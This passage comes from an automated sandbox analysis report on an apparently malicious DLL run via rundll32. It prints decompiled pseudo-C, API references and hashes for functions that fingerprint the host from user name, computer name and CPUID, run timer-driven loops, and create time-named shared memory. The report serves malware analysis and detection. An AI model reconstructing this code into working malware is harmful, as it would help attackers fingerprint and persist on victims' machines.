					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E04BFA5E9(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E04BF6106();
						L22:
						HeapFree( *0x4bfd238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E04BF2F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_t115 = E04BFA060(_t161, _a4, _a8, _a12); // executed
						_v12 = _t115;
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E04BF147E(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E04BF1600(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04BF147E(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}























































                                          0x04bf1754
                                          0x04bf1754
                                          0x04bf1754
                                          0x04bf175d
                                          0x04bf1766
                                          0x04bf1768
                                          0x04bf1768
                                          0x04bf1775
                                          0x04bf1780
                                          0x04bf1783
                                          0x04bf1788
                                          0x04bf1791
                                          0x04bf1794
                                          0x04bf1799
                                          0x04bf179c
                                          0x04bf17a1
                                          0x04bf17a4
                                          0x04bf17b0
                                          0x04bf17bd
                                          0x04bf17bf
                                          0x04bf17c5
                                          0x04bf17ca
                                          0x04bf17d5
                                          0x04bf17d7
                                          0x04bf17da
                                          0x04bf17dc
                                          0x04bf17e1
                                          0x04bf17e7
                                          0x04bf17ec
                                          0x04bf17ef
                                          0x04bf17f4
                                          0x04bf1801
                                          0x04bf1803
                                          0x04bf1809
                                          0x04bf1813
                                          0x04bf1813
                                          0x04bf1815
                                          0x04bf181a
                                          0x04bf181f
                                          0x04bf1822
                                          0x04bf1827
                                          0x04bf1834
                                          0x04bf1836
                                          0x04bf1844
                                          0x04bf1844
                                          0x04bf1846
                                          0x04bf1854
                                          0x04bf1859
                                          0x04bf185b
                                          0x04bf1860
                                          0x04bf1a2f
                                          0x04bf1a39
                                          0x04bf1a42
                                          0x04bf1866
                                          0x04bf1872
                                          0x04bf1878
                                          0x04bf187d
                                          0x04bf1a23
                                          0x04bf1a2d
                                          0x00000000
                                          0x04bf1a2d
                                          0x04bf1889
                                          0x04bf188e
                                          0x04bf1897
                                          0x04bf18a8
                                          0x04bf18ac
                                          0x04bf18b5
                                          0x04bf18bb
                                          0x04bf18ca
                                          0x04bf18d1
                                          0x04bf18da
                                          0x04bf18e0
                                          0x04bf1a17
                                          0x04bf1a21
                                          0x00000000
                                          0x04bf1a21
                                          0x04bf18ec
                                          0x04bf18f2
                                          0x04bf18f7
                                          0x04bf18f8
                                          0x04bf18ff
                                          0x04bf1904
                                          0x04bf1909
                                          0x04bf1a0d
                                          0x04bf1a15
                                          0x00000000
                                          0x04bf1a15
                                          0x04bf1912
                                          0x04bf1919
                                          0x04bf1921
                                          0x04bf1926
                                          0x04bf192f
                                          0x04bf1935
                                          0x04bf193c
                                          0x04bf1941
                                          0x04bf1946
                                          0x04bf1a45
                                          0x04bf19f9
                                          0x04bf19f9
                                          0x04bf19fe
                                          0x04bf1a09
                                          0x04bf1a0b
                                          0x00000000
                                          0x04bf1a0b
                                          0x04bf1950
                                          0x04bf1955
                                          0x04bf195a
                                          0x04bf195f
                                          0x04bf196a
                                          0x04bf196f
                                          0x04bf1972
                                          0x04bf1978
                                          0x04bf197e
                                          0x04bf1984
                                          0x04bf1987
                                          0x04bf198d
                                          0x04bf1990
                                          0x04bf1995
                                          0x04bf1999
                                          0x04bf1999
                                          0x04bf19a5
                                          0x04bf19b1
                                          0x04bf19b5
                                          0x04bf19b7
                                          0x04bf19bc
                                          0x04bf19be
                                          0x04bf19c3
                                          0x04bf19c8
                                          0x04bf19d5
                                          0x04bf19dd
                                          0x04bf19e0
                                          0x04bf19e0
                                          0x04bf19bc
                                          0x00000000
                                          0x04bf19a7
                                          0x04bf19ab
                                          0x04bf19e2
                                          0x04bf19e5
                                          0x04bf19ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bf19ee
                                          0x04bf19ad
                                          0x00000000
                                          0x04bf19ad
                                          0x04bf19a5

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04BF1768
                                          • wsprintfA.USER32 ref: 04BF17B8
                                          • wsprintfA.USER32 ref: 04BF17D5
                                          • wsprintfA.USER32 ref: 04BF1801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF1813
                                          • wsprintfA.USER32 ref: 04BF1834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF1844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BF1872
                                          • GetTickCount.KERNEL32 ref: 04BF1883
                                          • RtlEnterCriticalSection.NTDLL(070D9570), ref: 04BF1897
                                          • RtlLeaveCriticalSection.NTDLL(070D9570), ref: 04BF18B5
                                            • Part of subcall function 04BF4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04BF52FE,?,070D95B0), ref: 04BF4D57
                                            • Part of subcall function 04BF4D2C: lstrlen.KERNEL32(?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D5F
                                            • Part of subcall function 04BF4D2C: strcpy.NTDLL ref: 04BF4D76
                                            • Part of subcall function 04BF4D2C: lstrcat.KERNEL32(00000000,?), ref: 04BF4D81
                                            • Part of subcall function 04BF4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D9E
                                          • StrTrimA.SHLWAPI(00000000,04BFC294,?,070D95B0), ref: 04BF18EC
                                            • Part of subcall function 04BF9DEF: lstrlen.KERNEL32(?,00000000,00000000,04BF5335,616D692F,00000000), ref: 04BF9DFB
                                            • Part of subcall function 04BF9DEF: lstrlen.KERNEL32(?), ref: 04BF9E03
                                            • Part of subcall function 04BF9DEF: lstrcpy.KERNEL32(00000000,?), ref: 04BF9E1A
                                            • Part of subcall function 04BF9DEF: lstrcat.KERNEL32(00000000,?), ref: 04BF9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04BF1919
                                          • lstrcpy.KERNEL32(?,?), ref: 04BF1921
                                          • lstrcat.KERNEL32(?,?), ref: 04BF192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04BF1935
                                            • Part of subcall function 04BFA5E9: lstrlen.KERNEL32(?,00000000,04BFD330,00000001,04BF937A,04BFD00C,04BFD00C,00000000,00000005,00000000,00000000,?,?,?,04BF207E,?), ref: 04BFA5F2
                                            • Part of subcall function 04BFA5E9: mbstowcs.NTDLL ref: 04BFA619
                                            • Part of subcall function 04BFA5E9: memset.NTDLL ref: 04BFA62B
                                          • wcstombs.NTDLL ref: 04BF19C8
                                            • Part of subcall function 04BFA060: SysAllocString.OLEAUT32(?), ref: 04BFA09B
                                            • Part of subcall function 04BFA060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04BFA11E
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04BF1A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04BF1A15
                                          • HeapFree.KERNEL32(00000000,?,?,070D95B0), ref: 04BF1A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF1A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04BF1A39
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: 8e7a3d3b948f5046693dc6b3f3f3966808661eef6b22c3ce095eebad04e13a13
                                          • Instruction ID: c0d80746eeca1e7de153a18864fd8e90a1721c19e0d092848a2a5308118f94fd
                                          • Opcode Fuzzy Hash: 8e7a3d3b948f5046693dc6b3f3f3966808661eef6b22c3ce095eebad04e13a13
                                          • Instruction Fuzzy Hash: 0D913871900108EFDB11DFA8DC88A9ABBB9EF08314B114495FA0DE7260D739ED56DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF9B6F, Relevance: 16.7, APIs: 11, Instructions: 152timememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 4bf9b6f-4bf9ba1 memset CreateWaitableTimerA 98 4bf9ba7-4bf9c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 4bf9d23-4bf9d29 GetLastError 97->99 101 4bf9c8b-4bf9c91 98->101 102 4bf9c06-4bf9c09 98->102 100 4bf9d2d-4bf9d37 99->100 103 4bf9c92-4bf9c96 101->103 104 4bf9c0b call 4bf68cf 102->104 105 4bf9c14 102->105 106 4bf9c98-4bf9ca0 HeapFree 103->106 107 4bf9ca6-4bf9caa 103->107 110 4bf9c10-4bf9c12 104->110 109 4bf9c1e 105->109 106->107 107->103 111 4bf9cac-4bf9cb6 CloseHandle 107->111 112 4bf9c22-4bf9c27 109->112 110->105 110->109 111->100 113 4bf9c3a-4bf9c68 call 4bf9f11 112->113 114 4bf9c29-4bf9c30 112->114 118 4bf9c6a-4bf9c75 113->118 119 4bf9cb8-4bf9cbd 113->119 114->113 115 4bf9c32 114->115 115->113 118->112 120 4bf9c77-4bf9c87 call 4bf54ac 118->120 121 4bf9cbf-4bf9cc5 119->121 122 4bf9cdc-4bf9ce4 119->122 120->101 121->101 125 4bf9cc7-4bf9cda call 4bf6106 121->125 123 4bf9cea-4bf9d18 _allmul SetWaitableTimer WaitForMultipleObjects 122->123 123->112 126 4bf9d1e 123->126 125->123 126->101
                                          C-Code - Quality: 83%
                                          			E04BF9B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4bfd240);
					_v76 = 0;
					_v80 = 0;
					L04BFB088();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x4bfd26c; // 0x3d0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4bfd24c = 5;
						} else {
							_t68 = E04BF68CF(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x4bfd260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E04BF9F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E04BF54AC(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4bfd244);
							goto L21;
						} else {
							__eflags =  *0x4bfd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04BF6106();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4bfd248);
								L21:
								L04BFB088();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x4bfd238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                                          0x04bf9b6f
                                          0x04bf9b85
                                          0x04bf9b89
                                          0x04bf9b8e
                                          0x04bf9b95
                                          0x04bf9b9b
                                          0x04bf9ba1
                                          0x04bf9d29
                                          0x04bf9ba7
                                          0x04bf9ba7
                                          0x04bf9ba9
                                          0x04bf9bae
                                          0x04bf9baf
                                          0x04bf9bb5
                                          0x04bf9bb9
                                          0x04bf9bbd
                                          0x04bf9bcb
                                          0x04bf9bd9
                                          0x04bf9bdd
                                          0x04bf9bdf
                                          0x04bf9bec
                                          0x04bf9bf8
                                          0x04bf9bfa
                                          0x04bf9c00
                                          0x04bf9c09
                                          0x04bf9c14
                                          0x04bf9c14
                                          0x04bf9c0b
                                          0x04bf9c0b
                                          0x04bf9c12
                                          0x00000000
                                          0x00000000
                                          0x04bf9c12
                                          0x04bf9c1e
                                          0x00000000
                                          0x04bf9c22
                                          0x04bf9c27
                                          0x04bf9c32
                                          0x04bf9c32
                                          0x04bf9c3a
                                          0x04bf9c45
                                          0x04bf9c4d
                                          0x04bf9c56
                                          0x04bf9c59
                                          0x04bf9c5d
                                          0x04bf9c62
                                          0x04bf9c68
                                          0x00000000
                                          0x00000000
                                          0x04bf9c6a
                                          0x04bf9c6e
                                          0x04bf9c72
                                          0x04bf9c75
                                          0x00000000
                                          0x04bf9c77
                                          0x04bf9c87
                                          0x04bf9c87
                                          0x00000000
                                          0x04bf9cb8
                                          0x04bf9cb8
                                          0x04bf9cbd
                                          0x04bf9cdc
                                          0x04bf9cde
                                          0x04bf9ce3
                                          0x04bf9ce4
                                          0x00000000
                                          0x04bf9cbf
                                          0x04bf9cbf
                                          0x04bf9cc5
                                          0x00000000
                                          0x04bf9cc7
                                          0x04bf9cc7
                                          0x04bf9ccc
                                          0x04bf9cce
                                          0x04bf9cd3
                                          0x04bf9cd4
                                          0x04bf9cea
                                          0x04bf9cea
                                          0x04bf9cf2
                                          0x04bf9d00
                                          0x04bf9d04
                                          0x04bf9d10
                                          0x04bf9d12
                                          0x04bf9d16
                                          0x04bf9d18
                                          0x00000000
                                          0x04bf9d1e
                                          0x00000000
                                          0x04bf9d1e
                                          0x04bf9d18
                                          0x04bf9cc5
                                          0x00000000
                                          0x04bf9cbd
                                          0x04bf9c8b
                                          0x04bf9c8d
                                          0x04bf9c91
                                          0x04bf9c92
                                          0x04bf9c92
                                          0x04bf9c96
                                          0x04bf9ca0
                                          0x04bf9ca0
                                          0x04bf9ca6
                                          0x04bf9ca9
                                          0x04bf9ca9
                                          0x04bf9cb0
                                          0x04bf9cb0
                                          0x04bf9d37
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 04BF9B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04BF9B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04BF9BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04BF9BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04BF4AC4,?), ref: 04BF9BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04BF4AC4,?,00000000), ref: 04BF9CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04BF4AC4,?,00000000,?,?), ref: 04BF9CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04BF9CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04BF9D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BF9D10
                                            • Part of subcall function 04BF68CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,070D9388,00000000,?,7519F710,00000000,7519F730), ref: 04BF691E
                                            • Part of subcall function 04BF68CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,070D93C0,?,00000000,30314549,00000014,004F0053,070D937C), ref: 04BF69BB
                                            • Part of subcall function 04BF68CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04BF9C10), ref: 04BF69CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04BF4AC4,?,00000000,?,?), ref: 04BF9D23
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: bfe6dff0ee474c01df516fd9de3a92b310eec70559ad35a25be7b697b9bba6b2
                                          • Instruction ID: 170a90028692b5cde018ba9e171c3cfddbea4500a8462c67778e5e6646e64169
                                          • Opcode Fuzzy Hash: bfe6dff0ee474c01df516fd9de3a92b310eec70559ad35a25be7b697b9bba6b2
                                          • Instruction Fuzzy Hash: 36516DB1408314BFD710AF65DC44E5BBBE8FF85724F504A1AF9A983150E774E948CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF1A4E, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04BF1A4E(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04BFB082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4bfd2a4; // 0x24da5a8
				_t5 = _t13 + 0x4bfe836; // 0x70d8dde
				_t6 = _t13 + 0x4bfe59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04BFAD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0x4bfd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                          0x04bf1a4e
                                          0x04bf1a56
                                          0x04bf1a5a
                                          0x04bf1a60
                                          0x04bf1a65
                                          0x04bf1a6a
                                          0x04bf1a6d
                                          0x04bf1a70
                                          0x04bf1a75
                                          0x04bf1a76
                                          0x04bf1a79
                                          0x04bf1a7e
                                          0x04bf1a85
                                          0x04bf1a8f
                                          0x04bf1a91
                                          0x04bf1a92
                                          0x04bf1a95
                                          0x04bf1ab1
                                          0x04bf1ab7
                                          0x04bf1abb
                                          0x04bf1b09
                                          0x04bf1abd
                                          0x04bf1aca
                                          0x04bf1ada
                                          0x04bf1ae2
                                          0x04bf1af4
                                          0x04bf1af8
                                          0x00000000
                                          0x00000000
                                          0x04bf1ae4
                                          0x04bf1ae7
                                          0x04bf1aec
                                          0x04bf1aee
                                          0x04bf1aee
                                          0x04bf1acc
                                          0x04bf1ace
                                          0x04bf1afa
                                          0x04bf1afb
                                          0x04bf1afb
                                          0x04bf1aca
                                          0x04bf1b10

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04BF4996,?,?,4D283A53,?,?), ref: 04BF1A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04BF1A70
                                          • _snwprintf.NTDLL ref: 04BF1A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,04BFD2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04BF1AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04BF4996,?,?,4D283A53,?), ref: 04BF1AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04BF1ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04BF4996,?,?,4D283A53), ref: 04BF1AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04BF4996,?,?,4D283A53,?), ref: 04BF1B03
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: e789ad928f0af97d913c2c103f2cb9681e327ec4c64687693457f8cc9b9e60b2
                                          • Instruction ID: 74c606e30fc184258152f3395e76565478672d8b61131fd4d705472c8055d17a
                                          • Opcode Fuzzy Hash: e789ad928f0af97d913c2c103f2cb9681e327ec4c64687693457f8cc9b9e60b2
                                          • Instruction Fuzzy Hash: CD219F76600208FBD721EBBCCC45F997BB9EB44701F154162FA0EA7190E674ED4A8B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF93D5, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 4bf93d5-4bf93e9 140 4bf93eb-4bf93f0 139->140 141 4bf93f3-4bf9405 call 4bf6f89 139->141 140->141 144 4bf9459-4bf9466 141->144 145 4bf9407-4bf9417 GetUserNameW 141->145 147 4bf9468-4bf947f GetComputerNameW 144->147 146 4bf9419-4bf9429 RtlAllocateHeap 145->146 145->147 146->147 148 4bf942b-4bf9438 GetUserNameW 146->148 149 4bf94bd-4bf94e1 147->149 150 4bf9481-4bf9492 RtlAllocateHeap 147->150 151 4bf943a-4bf9446 call 4bf7cf7 148->151 152 4bf9448-4bf9457 HeapFree 148->152 150->149 153 4bf9494-4bf949d GetComputerNameW 150->153 151->152 152->147 155 4bf949f-4bf94ab call 4bf7cf7 153->155 156 4bf94ae-4bf94b7 HeapFree 153->156 155->156 156->149
                                          C-Code - Quality: 96%
                                          			E04BF93D5(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4bfd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04BF6F89( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4bfd2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4bfd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04BF7CF7(_v8 + _v8, _t64);
							}
							HeapFree( *0x4bfd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4bfd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04BF7CF7(_v8 + _v8, _t64);
						}
						HeapFree( *0x4bfd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                          0x04bf93d5
                                          0x04bf93dd
                                          0x04bf93e1
                                          0x04bf93e4
                                          0x04bf93e9
                                          0x04bf93eb
                                          0x04bf93f0
                                          0x04bf93f0
                                          0x04bf93f6
                                          0x04bf93f8
                                          0x04bf9405
                                          0x04bf9466
                                          0x04bf9407
                                          0x04bf940c
                                          0x04bf9412
                                          0x04bf9417
                                          0x04bf9425
                                          0x04bf9429
                                          0x04bf9438
                                          0x04bf943f
                                          0x04bf9446
                                          0x04bf9446
                                          0x04bf9451
                                          0x04bf9451
                                          0x04bf9429
                                          0x04bf9417
                                          0x04bf9468
                                          0x04bf946e
                                          0x04bf9478
                                          0x04bf947a
                                          0x04bf947f
                                          0x04bf948e
                                          0x04bf9492
                                          0x04bf949d
                                          0x04bf94a4
                                          0x04bf94ab
                                          0x04bf94ab
                                          0x04bf94b7
                                          0x04bf94b7
                                          0x04bf9492
                                          0x04bf94c2
                                          0x04bf94c4
                                          0x04bf94c7
                                          0x04bf94c9
                                          0x04bf94cc
                                          0x04bf94cf
                                          0x04bf94d9
                                          0x04bf94dd
                                          0x04bf94e1

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04BF940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BF9423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04BF9430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF9451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04BF9478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BF948C
